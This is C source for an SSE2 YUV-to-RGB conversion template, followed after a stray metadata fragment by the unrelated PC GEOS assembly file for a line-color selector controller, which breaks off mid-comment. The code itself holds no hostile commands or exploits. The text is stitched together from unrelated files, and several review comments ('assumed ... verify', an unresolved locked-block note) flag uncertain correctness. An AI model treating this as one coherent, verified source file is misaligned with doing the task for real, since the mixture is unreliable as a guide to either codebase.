__m128i rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8; \
\
PACK_RGB565_32(r_8_11, r_8_12, g_8_11, g_8_12, b_8_11, b_8_12, rgb_1, rgb_2, rgb_3, rgb_4) \
\
PACK_RGB565_32(r_8_21, r_8_22, g_8_21, g_8_22, b_8_21, b_8_22, rgb_5, rgb_6, rgb_7, rgb_8) \
/* end RGB565 PACK_PIXEL */
#elif RGB_FORMAT == RGB_FORMAT_RGB24
#define PACK_PIXEL \
__m128i rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6; \
__m128i rgb_7, rgb_8, rgb_9, rgb_10, rgb_11, rgb_12; \
\
PACK_RGB24_32(r_8_11, r_8_12, g_8_11, g_8_12, b_8_11, b_8_12, rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6) \
\
PACK_RGB24_32(r_8_21, r_8_22, g_8_21, g_8_22, b_8_21, b_8_22, rgb_7, rgb_8, rgb_9, rgb_10, rgb_11, rgb_12) \
/* end RGB24 PACK_PIXEL */
#elif RGB_FORMAT == RGB_FORMAT_RGBA
#define PACK_PIXEL \
__m128i rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8; \
__m128i rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16; \
__m128i a = _mm_set1_epi8((char)0xFF); \
\
PACK_RGBA_32(r_8_11, r_8_12, g_8_11, g_8_12, b_8_11, b_8_12, a, a, rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8) \
\
PACK_RGBA_32(r_8_21, r_8_22, g_8_21, g_8_22, b_8_21, b_8_22, a, a, rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16) \
/* end RGBA PACK_PIXEL */
#elif RGB_FORMAT == RGB_FORMAT_BGRA
#define PACK_PIXEL \
__m128i rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8; \
__m128i rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16; \
__m128i a = _mm_set1_epi8((char)0xFF); \
\
PACK_RGBA_32(b_8_11, b_8_12, g_8_11, g_8_12, r_8_11, r_8_12, a, a, rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8) \
\
PACK_RGBA_32(b_8_21, b_8_22, g_8_21, g_8_22, r_8_21, r_8_22, a, a, rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16) \
/* end BGRA PACK_PIXEL */
#elif RGB_FORMAT == RGB_FORMAT_ARGB
#define PACK_PIXEL \
__m128i rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8; \
__m128i rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16; \
__m128i a = _mm_set1_epi8((char)0xFF); \
\
PACK_RGBA_32(a, a, r_8_11, r_8_12, g_8_11, g_8_12, b_8_11, b_8_12, rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8) \
\
PACK_RGBA_32(a, a, r_8_21, r_8_22, g_8_21, g_8_22, b_8_21, b_8_22, rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16) \
/* end ARGB PACK_PIXEL */
#elif RGB_FORMAT == RGB_FORMAT_ABGR
#define PACK_PIXEL \
__m128i rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8; \
__m128i rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16; \
__m128i a = _mm_set1_epi8((char)0xFF); \
\
PACK_RGBA_32(a, a, b_8_11, b_8_12, g_8_11, g_8_12, r_8_11, r_8_12, rgb_1, rgb_2, rgb_3, rgb_4, rgb_5, rgb_6, rgb_7, rgb_8) \
\
PACK_RGBA_32(a, a, b_8_21, b_8_22, g_8_21, g_8_22, r_8_21, r_8_22, rgb_9, rgb_10, rgb_11, rgb_12, rgb_13, rgb_14, rgb_15, rgb_16) \
/* end ABGR PACK_PIXEL */
#else
#error PACK_PIXEL unimplemented
#endif
/*
 * SAVE_LINE1/SAVE_LINE2: store the packed registers for the upper and
 * lower pixel row; the store count per line depends on RGB_FORMAT's
 * bytes-per-pixel (RGB565: 64 B, RGB24: 96 B, 32-bpp formats: 128 B).
 */
#if RGB_FORMAT == RGB_FORMAT_RGB565
#define SAVE_LINE1 \
SAVE_SI128((__m128i*)(rgb_ptr1), rgb_1); \
SAVE_SI128((__m128i*)(rgb_ptr1+16), rgb_2); \
SAVE_SI128((__m128i*)(rgb_ptr1+32), rgb_3); \
SAVE_SI128((__m128i*)(rgb_ptr1+48), rgb_4); \
/* end RGB565 SAVE_LINE1 */
#define SAVE_LINE2 \
SAVE_SI128((__m128i*)(rgb_ptr2), rgb_5); \
SAVE_SI128((__m128i*)(rgb_ptr2+16), rgb_6); \
SAVE_SI128((__m128i*)(rgb_ptr2+32), rgb_7); \
SAVE_SI128((__m128i*)(rgb_ptr2+48), rgb_8); \
/* end RGB565 SAVE_LINE2 */
#elif RGB_FORMAT == RGB_FORMAT_RGB24
#define SAVE_LINE1 \
SAVE_SI128((__m128i*)(rgb_ptr1), rgb_1); \
SAVE_SI128((__m128i*)(rgb_ptr1+16), rgb_2); \
SAVE_SI128((__m128i*)(rgb_ptr1+32), rgb_3); \
SAVE_SI128((__m128i*)(rgb_ptr1+48), rgb_4); \
SAVE_SI128((__m128i*)(rgb_ptr1+64), rgb_5); \
SAVE_SI128((__m128i*)(rgb_ptr1+80), rgb_6); \
/* end RGB24 SAVE_LINE1 */
#define SAVE_LINE2 \
SAVE_SI128((__m128i*)(rgb_ptr2), rgb_7); \
SAVE_SI128((__m128i*)(rgb_ptr2+16), rgb_8); \
SAVE_SI128((__m128i*)(rgb_ptr2+32), rgb_9); \
SAVE_SI128((__m128i*)(rgb_ptr2+48), rgb_10); \
SAVE_SI128((__m128i*)(rgb_ptr2+64), rgb_11); \
SAVE_SI128((__m128i*)(rgb_ptr2+80), rgb_12); \
/* end RGB24 SAVE_LINE2 */
#elif RGB_FORMAT == RGB_FORMAT_RGBA || RGB_FORMAT == RGB_FORMAT_BGRA || \
RGB_FORMAT == RGB_FORMAT_ARGB || RGB_FORMAT == RGB_FORMAT_ABGR
#define SAVE_LINE1 \
SAVE_SI128((__m128i*)(rgb_ptr1), rgb_1); \
SAVE_SI128((__m128i*)(rgb_ptr1+16), rgb_2); \
SAVE_SI128((__m128i*)(rgb_ptr1+32), rgb_3); \
SAVE_SI128((__m128i*)(rgb_ptr1+48), rgb_4); \
SAVE_SI128((__m128i*)(rgb_ptr1+64), rgb_5); \
SAVE_SI128((__m128i*)(rgb_ptr1+80), rgb_6); \
SAVE_SI128((__m128i*)(rgb_ptr1+96), rgb_7); \
SAVE_SI128((__m128i*)(rgb_ptr1+112), rgb_8); \
/* end 32-bpp SAVE_LINE1 */
#define SAVE_LINE2 \
SAVE_SI128((__m128i*)(rgb_ptr2), rgb_9); \
SAVE_SI128((__m128i*)(rgb_ptr2+16), rgb_10); \
SAVE_SI128((__m128i*)(rgb_ptr2+32), rgb_11); \
SAVE_SI128((__m128i*)(rgb_ptr2+48), rgb_12); \
SAVE_SI128((__m128i*)(rgb_ptr2+64), rgb_13); \
SAVE_SI128((__m128i*)(rgb_ptr2+80), rgb_14); \
SAVE_SI128((__m128i*)(rgb_ptr2+96), rgb_15); \
SAVE_SI128((__m128i*)(rgb_ptr2+112), rgb_16); \
/* end 32-bpp SAVE_LINE2 */
#else
#error SAVE_LINE unimplemented
#endif
/*
 * READ_Y loads 16 luma samples into `y`; READ_UV loads 16 samples per
 * chroma plane into `u` and `v`.  De-interleaving depends on YUV_FORMAT:
 *  - 420: planar layout, direct 16-byte loads;
 *  - 422: packed layout, so luma occupies every other byte (isolate the
 *    low byte of each 16-bit lane via shift-left/shift-right, then
 *    re-pack) and each chroma component every fourth byte (same trick on
 *    32-bit lanes);
 *  - NV12: planar luma plus byte-interleaved UV (u_ptr/v_ptr are assumed
 *    to point into the interleaved plane one byte apart -- every other
 *    byte is masked out).
 */
#if YUV_FORMAT == YUV_FORMAT_420
#define READ_Y(y_ptr) \
y = LOAD_SI128((const __m128i*)(y_ptr)); \
#define READ_UV \
u = LOAD_SI128((const __m128i*)(u_ptr)); \
v = LOAD_SI128((const __m128i*)(v_ptr)); \
#elif YUV_FORMAT == YUV_FORMAT_422
#define READ_Y(y_ptr) \
{ \
__m128i y1, y2; \
y1 = _mm_srli_epi16(_mm_slli_epi16(LOAD_SI128((const __m128i*)(y_ptr)), 8), 8); \
y2 = _mm_srli_epi16(_mm_slli_epi16(LOAD_SI128((const __m128i*)(y_ptr+16)), 8), 8); \
y = _mm_packus_epi16(y1, y2); \
}
#define READ_UV \
{ \
__m128i u1, u2, u3, u4, v1, v2, v3, v4; \
u1 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(u_ptr)), 24), 24); \
u2 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(u_ptr+16)), 24), 24); \
u3 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(u_ptr+32)), 24), 24); \
u4 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(u_ptr+48)), 24), 24); \
u = _mm_packus_epi16(_mm_packs_epi32(u1, u2), _mm_packs_epi32(u3, u4)); \
v1 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(v_ptr)), 24), 24); \
v2 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(v_ptr+16)), 24), 24); \
v3 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(v_ptr+32)), 24), 24); \
v4 = _mm_srli_epi32(_mm_slli_epi32(LOAD_SI128((const __m128i*)(v_ptr+48)), 24), 24); \
v = _mm_packus_epi16(_mm_packs_epi32(v1, v2), _mm_packs_epi32(v3, v4)); \
}
#elif YUV_FORMAT == YUV_FORMAT_NV12
#define READ_Y(y_ptr) \
y = LOAD_SI128((const __m128i*)(y_ptr)); \
#define READ_UV \
{ \
__m128i u1, u2, v1, v2; \
u1 = _mm_srli_epi16(_mm_slli_epi16(LOAD_SI128((const __m128i*)(u_ptr)), 8), 8); \
u2 = _mm_srli_epi16(_mm_slli_epi16(LOAD_SI128((const __m128i*)(u_ptr+16)), 8), 8); \
u = _mm_packus_epi16(u1, u2); \
v1 = _mm_srli_epi16(_mm_slli_epi16(LOAD_SI128((const __m128i*)(v_ptr)), 8), 8); \
v2 = _mm_srli_epi16(_mm_slli_epi16(LOAD_SI128((const __m128i*)(v_ptr+16)), 8), 8); \
v = _mm_packus_epi16(v1, v2); \
}
#else
#error READ_UV unimplemented
#endif
/*
 * YUV2RGB_32: convert one 32x2-pixel block.  READ_UV loads the chroma
 * once; its RGB contribution (r_uv_*, g_uv_*, b_uv_*) is cached and
 * reused for both image lines (which share chroma samples for vertically
 * subsampled formats) and recomputed only between the two 16-pixel
 * halves.  Per-line luma is then added (ADD_Y2RGB_16) and the 16-bit
 * intermediates are saturate-packed down to the 8-bit r/g/b_8_* regs
 * consumed by PACK_PIXEL.
 */
#define YUV2RGB_32 \
__m128i r_tmp, g_tmp, b_tmp; \
__m128i r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2; \
__m128i r_uv_16_1, g_uv_16_1, b_uv_16_1, r_uv_16_2, g_uv_16_2, b_uv_16_2; \
__m128i y_16_1, y_16_2; \
__m128i y, u, v, u_16, v_16; \
__m128i r_8_11, g_8_11, b_8_11, r_8_21, g_8_21, b_8_21; \
__m128i r_8_12, g_8_12, b_8_12, r_8_22, g_8_22, b_8_22; \
\
READ_UV \
\
/* process first 16 pixels of first line */\
u_16 = _mm_unpacklo_epi8(u, _mm_setzero_si128()); \
v_16 = _mm_unpacklo_epi8(v, _mm_setzero_si128()); \
u_16 = _mm_add_epi16(u_16, _mm_set1_epi16(-128)); \
v_16 = _mm_add_epi16(v_16, _mm_set1_epi16(-128)); \
\
UV2RGB_16(u_16, v_16, r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2) \
r_uv_16_1=r_16_1; g_uv_16_1=g_16_1; b_uv_16_1=b_16_1; \
r_uv_16_2=r_16_2; g_uv_16_2=g_16_2; b_uv_16_2=b_16_2; \
\
READ_Y(y_ptr1) \
y_16_1 = _mm_unpacklo_epi8(y, _mm_setzero_si128()); \
y_16_2 = _mm_unpackhi_epi8(y, _mm_setzero_si128()); \
\
ADD_Y2RGB_16(y_16_1, y_16_2, r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2) \
\
r_8_11 = _mm_packus_epi16(r_16_1, r_16_2); \
g_8_11 = _mm_packus_epi16(g_16_1, g_16_2); \
b_8_11 = _mm_packus_epi16(b_16_1, b_16_2); \
\
/* process first 16 pixels of second line */\
r_16_1=r_uv_16_1; g_16_1=g_uv_16_1; b_16_1=b_uv_16_1; \
r_16_2=r_uv_16_2; g_16_2=g_uv_16_2; b_16_2=b_uv_16_2; \
\
READ_Y(y_ptr2) \
y_16_1 = _mm_unpacklo_epi8(y, _mm_setzero_si128()); \
y_16_2 = _mm_unpackhi_epi8(y, _mm_setzero_si128()); \
\
ADD_Y2RGB_16(y_16_1, y_16_2, r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2) \
\
r_8_21 = _mm_packus_epi16(r_16_1, r_16_2); \
g_8_21 = _mm_packus_epi16(g_16_1, g_16_2); \
b_8_21 = _mm_packus_epi16(b_16_1, b_16_2); \
\
/* process last 16 pixels of first line */\
u_16 = _mm_unpackhi_epi8(u, _mm_setzero_si128()); \
v_16 = _mm_unpackhi_epi8(v, _mm_setzero_si128()); \
u_16 = _mm_add_epi16(u_16, _mm_set1_epi16(-128)); \
v_16 = _mm_add_epi16(v_16, _mm_set1_epi16(-128)); \
\
UV2RGB_16(u_16, v_16, r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2) \
r_uv_16_1=r_16_1; g_uv_16_1=g_16_1; b_uv_16_1=b_16_1; \
r_uv_16_2=r_16_2; g_uv_16_2=g_16_2; b_uv_16_2=b_16_2; \
\
READ_Y(y_ptr1+16*y_pixel_stride) \
y_16_1 = _mm_unpacklo_epi8(y, _mm_setzero_si128()); \
y_16_2 = _mm_unpackhi_epi8(y, _mm_setzero_si128()); \
\
ADD_Y2RGB_16(y_16_1, y_16_2, r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2) \
\
r_8_12 = _mm_packus_epi16(r_16_1, r_16_2); \
g_8_12 = _mm_packus_epi16(g_16_1, g_16_2); \
b_8_12 = _mm_packus_epi16(b_16_1, b_16_2); \
\
/* process last 16 pixels of second line */\
r_16_1=r_uv_16_1; g_16_1=g_uv_16_1; b_16_1=b_uv_16_1; \
r_16_2=r_uv_16_2; g_16_2=g_uv_16_2; b_16_2=b_uv_16_2; \
\
READ_Y(y_ptr2+16*y_pixel_stride) \
y_16_1 = _mm_unpacklo_epi8(y, _mm_setzero_si128()); \
y_16_2 = _mm_unpackhi_epi8(y, _mm_setzero_si128()); \
\
ADD_Y2RGB_16(y_16_1, y_16_2, r_16_1, g_16_1, b_16_1, r_16_2, g_16_2, b_16_2) \
\
r_8_22 = _mm_packus_epi16(r_16_1, r_16_2); \
g_8_22 = _mm_packus_epi16(g_16_1, g_16_2); \
b_8_22 = _mm_packus_epi16(b_16_1, b_16_2); \
\
/*
 * SSE2 YUV -> RGB conversion entry point.  The function name and the
 * READ_* / PACK_* / SAVE_* helpers are selected by the YUV_FORMAT and
 * RGB_FORMAT macros defined by the file that includes this template.
 *
 * The bulk of the image is converted in 32x2-pixel SSE blocks; the
 * leftover right-hand column (width not a multiple of 32) and, for
 * vertically subsampled formats, a leftover last line are delegated to
 * the scalar STD_FUNCTION_NAME implementation.
 *
 * width, height       : image size in pixels
 * Y, U, V             : source planes (U/V layout depends on YUV_FORMAT)
 * Y_stride, UV_stride : bytes per source line
 * RGB, RGB_stride     : destination buffer and bytes per destination line
 * yuv_type            : selects the conversion coefficient set
 */
void SSE_FUNCTION_NAME(uint32_t width, uint32_t height,
    const uint8_t *Y, const uint8_t *U, const uint8_t *V, uint32_t Y_stride, uint32_t UV_stride,
    uint8_t *RGB, uint32_t RGB_stride,
    YCbCrType yuv_type)
{
    const YUV2RGBParam *const param = &(YUV2RGB[yuv_type]);
#if YUV_FORMAT == YUV_FORMAT_420
    const int y_pixel_stride = 1;
    const int uv_pixel_stride = 1;
    const int uv_x_sample_interval = 2;
    const int uv_y_sample_interval = 2;
#elif YUV_FORMAT == YUV_FORMAT_422
    const int y_pixel_stride = 2;
    const int uv_pixel_stride = 4;
    const int uv_x_sample_interval = 2;
    const int uv_y_sample_interval = 1;
#elif YUV_FORMAT == YUV_FORMAT_NV12
    const int y_pixel_stride = 1;
    const int uv_pixel_stride = 2;
    const int uv_x_sample_interval = 2;
    const int uv_y_sample_interval = 2;
#endif
#if RGB_FORMAT == RGB_FORMAT_RGB565
    const int rgb_pixel_stride = 2;
#elif RGB_FORMAT == RGB_FORMAT_RGB24
    const int rgb_pixel_stride = 3;
#elif RGB_FORMAT == RGB_FORMAT_RGBA || RGB_FORMAT == RGB_FORMAT_BGRA || \
    RGB_FORMAT == RGB_FORMAT_ARGB || RGB_FORMAT == RGB_FORMAT_ABGR
    const int rgb_pixel_stride = 4;
#else
#error Unknown RGB pixel size
#endif
    /* Degenerate image: nothing to convert.  This guard also prevents the
     * unsigned underflow of (height-(uv_y_sample_interval-1)) in the loop
     * bound below when height == 0 and uv_y_sample_interval == 2, which
     * previously made the loop run and read out of bounds. */
    if (width == 0 || height == 0)
        return;
    if (width >= 32) {
        uint32_t xpos, ypos;
        /* Convert uv_y_sample_interval lines at a time: with 2x vertical
         * chroma subsampling both lines share the same chroma samples. */
        for(ypos=0; ypos<(height-(uv_y_sample_interval-1)); ypos+=uv_y_sample_interval)
        {
            const uint8_t *y_ptr1=Y+ypos*Y_stride,
                *y_ptr2=Y+(ypos+1)*Y_stride,
                *u_ptr=U+(ypos/uv_y_sample_interval)*UV_stride,
                *v_ptr=V+(ypos/uv_y_sample_interval)*UV_stride;
            uint8_t *rgb_ptr1=RGB+ypos*RGB_stride,
                *rgb_ptr2=RGB+(ypos+1)*RGB_stride;
            for(xpos=0; xpos<(width-31); xpos+=32)
            {
                YUV2RGB_32
                {
                    PACK_PIXEL
                    SAVE_LINE1
                    if (uv_y_sample_interval > 1)
                    {
                        SAVE_LINE2
                    }
                }
                y_ptr1+=32*y_pixel_stride;
                y_ptr2+=32*y_pixel_stride;
                u_ptr+=32*uv_pixel_stride/uv_x_sample_interval;
                v_ptr+=32*uv_pixel_stride/uv_x_sample_interval;
                rgb_ptr1+=32*rgb_pixel_stride;
                rgb_ptr2+=32*rgb_pixel_stride;
            }
        }
        /* Catch the last line, if needed: odd height with 2x vertical
         * subsampling leaves one unconverted line for the scalar path. */
        if (uv_y_sample_interval == 2 && ypos == (height-1))
        {
            const uint8_t *y_ptr=Y+ypos*Y_stride,
                *u_ptr=U+(ypos/uv_y_sample_interval)*UV_stride,
                *v_ptr=V+(ypos/uv_y_sample_interval)*UV_stride;
            uint8_t *rgb_ptr=RGB+ypos*RGB_stride;
            STD_FUNCTION_NAME(width, 1, y_ptr, u_ptr, v_ptr, Y_stride, UV_stride, rgb_ptr, RGB_stride, yuv_type);
        }
    }
    /* Catch the right column, if needed (width not a multiple of 32). */
    {
        int converted = (width & ~31);
        if (converted != width)
        {
            const uint8_t *y_ptr=Y+converted*y_pixel_stride,
                *u_ptr=U+converted*uv_pixel_stride/uv_x_sample_interval,
                *v_ptr=V+converted*uv_pixel_stride/uv_x_sample_interval;
            uint8_t *rgb_ptr=RGB+converted*rgb_pixel_stride;
            STD_FUNCTION_NAME(width-converted, height, y_ptr, u_ptr, v_ptr, Y_stride, UV_stride, rgb_ptr, RGB_stride, yuv_type);
        }
    }
}
#undef SSE_FUNCTION_NAME
#undef STD_FUNCTION_NAME
#undef YUV_FORMAT
#undef RGB_FORMAT
#undef SSE_ALIGNED
#undef LOAD_SI128
#undef SAVE_SI128
#undef UV2RGB_16
#undef ADD_Y2RGB_16
#undef PACK_RGB24_32_STEP1
#undef PACK_RGB24_32_STEP2
#undef PACK_RGB24_32
#undef PACK_RGBA_32
#undef PACK_PIXEL
#undef SAVE_LINE1
#undef SAVE_LINE2
#undef READ_Y
#undef READ_UV
#undef YUV2RGB_32
| {
"language": "Assembly"
} |
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) GeoWorks 1991 -- All Rights Reserved
PROJECT: PC GEOS
MODULE:
FILE: uiLineColorSelector.asm
AUTHOR: Jon Witort
REVISION HISTORY:
Name Date Description
---- ---- -----------
jon 24 feb 1992 Initial version.
DESCRIPTION:
Code for the GrObjLineColorSelectorClass
$Id: uiLineColorSelector.asm,v 1.1 97/04/04 18:06:57 newdeal Exp $
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GrObjUIControllerCode segment resource
COMMENT @----------------------------------------------------------------------
MESSAGE: GrObjLineColorSelectorGetInfo --
MSG_GEN_CONTROL_GET_INFO for GrObjLineColorSelectorClass
DESCRIPTION: Return group
PASS:
*ds:si - instance data
es - segment of GrObjLineColorSelectorClass
ax - The message
RETURN:
cx:dx - list of children
DESTROYED:
bx, si, di, ds, es (message handler)
REGISTER/STACK USAGE:
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
Tony 10/31/91 Initial version
------------------------------------------------------------------------------@
;
; Let the superclass fill in the generic ColorSelector build info, then
; overlay the line-color-selector-specific fields from GOLCS_newFields.
;
GrObjLineColorSelectorGetInfo method dynamic GrObjLineColorSelectorClass,
MSG_GEN_CONTROL_GET_INFO
; first call our superclass to get the color selector's stuff
pushdw cxdx ; preserve pointer to the GenControlBuildInfo buffer
mov di, offset GrObjLineColorSelectorClass
call ObjCallSuperNoLock
; now fill in a few things
popdw esdi ; es:di = GenControlBuildInfo buffer to patch
mov si, offset GOLCS_newFields ; si = table of field overrides
mov cx, length GOLCS_newFields ; cx = number of overrides
call CopyFieldsToBuildInfo
ret
GrObjLineColorSelectorGetInfo endm
; Table of GenControlBuildInfo fields that GrObjLineColorSelectorGetInfo
; copies over the superclass's defaults (see CopyFieldsToBuildInfo):
; controller flags, .ini key, GCN/notification lists, name, features and
; help context.
GOLCS_newFields GC_NewField \
<offset GCBI_flags, size GCBI_flags,
<GCD_dword mask GCBF_SUSPEND_ON_APPLY>>,
<offset GCBI_initFileKey, size GCBI_initFileKey,
<GCD_dword GOLCS_IniFileKey>>,
<offset GCBI_gcnList, size GCBI_gcnList,
<GCD_dword GOLCS_gcnList>>,
<offset GCBI_gcnCount, size GCBI_gcnCount,
<GCD_dword size GOLCS_gcnList>>,
<offset GCBI_notificationList, size GCBI_notificationList,
<GCD_dword GOLCS_notifyList>>,
<offset GCBI_notificationCount, size GCBI_notificationCount,
<GCD_dword size GOLCS_notifyList>>,
<offset GCBI_controllerName, size GCBI_controllerName,
<GCD_optr GOLCSName>>,
<offset GCBI_features, size GCBI_features,
<GCD_dword GOLCC_DEFAULT_FEATURES>>,
<offset GCBI_toolFeatures, size GCBI_toolFeatures,
<GCD_dword GOLCC_DEFAULT_TOOLBOX_FEATURES>>,
<offset GCBI_helpContext, size GCBI_helpContext,
<GCD_dword GOLCS_helpContext>>
if FULL_EXECUTE_IN_PLACE
GrObjControlInfoXIP segment resource
endif
; Static controller data referenced by the build-info table above.
GOLCS_helpContext char "dbGrObjLiClr", 0
GOLCS_IniFileKey char "GrObjLineColor", 0
GOLCS_gcnList GCNListType \
<MANUFACTURER_ID_GEOWORKS, GAGCNLT_APP_TARGET_NOTIFY_GROBJ_LINE_ATTR_CHANGE>
GOLCS_notifyList NotificationType \
<MANUFACTURER_ID_GEOWORKS, GWNT_GROBJ_LINE_ATTR_CHANGE>
if FULL_EXECUTE_IN_PLACE
GrObjControlInfoXIP ends
endif
COMMENT @----------------------------------------------------------------------
MESSAGE: GrObjLineColorSelectorOutputAction -- MSG_GEN_OUTPUT_ACTION
for GrObjLineColorSelectorClass
DESCRIPTION: Intercept ColorSelector output that we want
PASS:
*ds:si - instance data
es - segment of GrObjLineColorSelectorClass
ax - The message
cx:dx - destination (or travel option)
bp - event
RETURN:
DESTROYED:
bx, si, di, ds, es (message handler)
REGISTER/STACK USAGE:
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
Tony 3/24/92 Initial version
------------------------------------------------------------------------------@
;
; Route MSG_GEN_OUTPUT_ACTION through ColorInterceptAction so the color
; selector messages we handle (set-color / set-draw-mask) are intercepted
; instead of being passed straight to the output.
;
GrObjLineColorSelectorOutputAction method dynamic GrObjLineColorSelectorClass,
MSG_GEN_OUTPUT_ACTION
mov di, offset GrObjLineColorSelectorClass
call ColorInterceptAction
ret
GrObjLineColorSelectorOutputAction endm
COMMENT @----------------------------------------------------------------------
MESSAGE: GrObjLineColorSelectorSetColor -- MSG_META_COLORED_OBJECT_SET_COLOR
for GrObjLineColorSelectorClass
DESCRIPTION: Handle a color change
PASS:
*ds:si - instance data
es - segment of GrObjLineColorSelectorClass
ax - The message
dxcx - color
RETURN:
DESTROYED:
bx, si, di, ds, es (message handler)
REGISTER/STACK USAGE:
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
Tony 3/24/92 Initial version
------------------------------------------------------------------------------@
GrObjLineColorSelectorSetColor method dynamic GrObjLineColorSelectorClass,
MSG_META_COLORED_OBJECT_SET_COLOR
uses ax, cx, dx, bp
.enter
; if passed index then convert to RGB
cmp ch, CF_RGB
jz rgb
; must convert index to rgb
xchgdw dxcx, bxax ; free dxcx; ax = index color word
clr di ; di = 0 for GrMapColorIndex (assumed: default map -- verify)
mov ah, al ;ah = index
call GrMapColorIndex ;al <- red, bl <- green, bh <- blue
xchgdw dxcx, bxax ; back into dxcx: cl=red, dl=green, dh=blue
rgb:
; cl = red, dl = green, dh = blue
; repack into the register layout MSG_GO_SET_LINE_COLOR expects:
; cl = red, ch = green, dl = blue
mov ch, dl
mov dl, dh
mov ax, MSG_GO_SET_LINE_COLOR
call GrObjControlOutputActionRegsToGrObjs
.leave
ret
GrObjLineColorSelectorSetColor endm
;---
;
; MSG_META_COLORED_OBJECT_SET_DRAW_MASK handler: forward the new draw
; mask (left in the message registers) to the selected grobjs as
; MSG_GO_SET_LINE_MASK.
;
GrObjLineColorSelectorSetDrawMask method dynamic GrObjLineColorSelectorClass, MSG_META_COLORED_OBJECT_SET_DRAW_MASK
.enter
mov ax, MSG_GO_SET_LINE_MASK
call GrObjControlOutputActionRegsToGrObjs
.leave
ret
GrObjLineColorSelectorSetDrawMask endm
COMMENT @----------------------------------------------------------------------
MESSAGE: GrObjLineColorSelectorUpdateUI --
MSG_GEN_CONTROL_UPDATE_UI for GrObjLineColorSelectorClass
DESCRIPTION: Handle notification of attributes change
PASS:
*ds:si - instance data
es - segment of GrObjLineColorSelectorClass
ax - The message
ss:bp - GenControlUpdateUIParams
GCUUIP_manufacturer ManufacturerIDs
GCUUIP_changeType word
GCUUIP_dataBlock hptr
GCUUIP_toolInteraction optr
GCUUIP_features word
GCUUIP_toolboxFeatures word
GCUUIP_childBlock hptr
RETURN: none
DESTROYED:
bx, si, di, ds, es (message handler)
REGISTER/STACK USAGE:
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
Tony 11/12/91 Initial version
------------------------------------------------------------------------------@
GrObjLineColorSelectorUpdateUI method dynamic GrObjLineColorSelectorClass,
MSG_GEN_CONTROL_UPDATE_UI
push ds
mov dx, GWNT_GROBJ_LINE_ATTR_CHANGE
call GetLineNotifyColor ; locks data block; Z set if our notification type
jne done ; not a line-attr notification
call UnlockNotifBlock
pop ds
; dxcx - color
; al - DrawMasks
; bx - GraphicPattern NOT YET
; di - VisTextCharAttrFlags
; GAAD_MULTIPLE_COLORS
; GAAD_MULTIPLE_GRAY_SCREENS
; GAAD_MULTIPLE_PATTERNS
call UpdateLineColorCommon
ret
done:
; BUGFIX: the original code fell straight to "ret" here with the ds
; pushed at method entry still on the stack, so ret returned through the
; saved ds value.  Restore ds before returning.
; NOTE(review): as in the original code, the notification block locked by
; GetLineNotifyColor is left locked on this path -- confirm whether
; UnlockNotifBlock should be called here as well.
pop ds
ret
GrObjLineColorSelectorUpdateUI endm
COMMENT @----------------------------------------------------------------------
FUNCTION: UpdateLineColorCommon
DESCRIPTION: Common code to update a color selector
CALLED BY: INTERNAL
PASS:
*ds:si - controller
ss:bp - GenControlUpdateUIParams
dxcx - color
al - DrawMasks
bx - GraphicPattern
di - VisTextCharAttrFlags
VTCAF_MULTIPLE_COLORS
VTCAF_MULTIPLE_GRAY_SCREENS
VTCAF_MULTIPLE_PATTERNS
RETURN:
none
DESTROYED:
ax, bx, cx, dx, si, di
REGISTER/STACK USAGE:
PSEUDO CODE/STRATEGY:
